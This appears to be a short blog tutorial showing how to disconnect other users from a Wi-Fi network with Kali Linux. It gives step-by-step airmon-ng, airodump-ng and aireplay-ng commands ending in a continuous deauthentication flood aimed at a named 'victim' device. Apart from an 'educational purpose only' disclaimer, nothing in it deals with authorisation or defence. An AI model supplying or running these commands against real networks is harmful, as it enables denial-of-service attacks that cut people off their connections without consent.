HOW TO KICK OUT SOMEONE FROM THE WIFI USING KALI LINUX


WARNING

This tutorial is for educational purpose only. We are not responsible for your consequences.
1- Open terminal and type:
airmon-ng check kill
airmon-ng start <your_interface>
It will start monitor mode.
To check your network interface type:
airmon-ng
wlan0 is my network interface and wlan0mon is my monitor mode interface.
2- To see available networks type:
airodump-ng <moniter_mode_interface>
3- To refine your available networks type:
airodump-ng -c <channel> –bssid <bssid> <moniter_mode_interface>
4- Now to disconnect any connection type:
aireplay-ng -0 0 -a  <your_bssid>  -c <victim’s_bssid> <monitor_mode_interface>
It will start sending De-authentication to the connection and disconnect it.
Send the number of Deauths to the selected BSSID to keep on disconnecting them from the wifi
The wifi will be reconnected after the sending of Deauths has been finished.

Comments

Popular posts from this blog

SNIFFING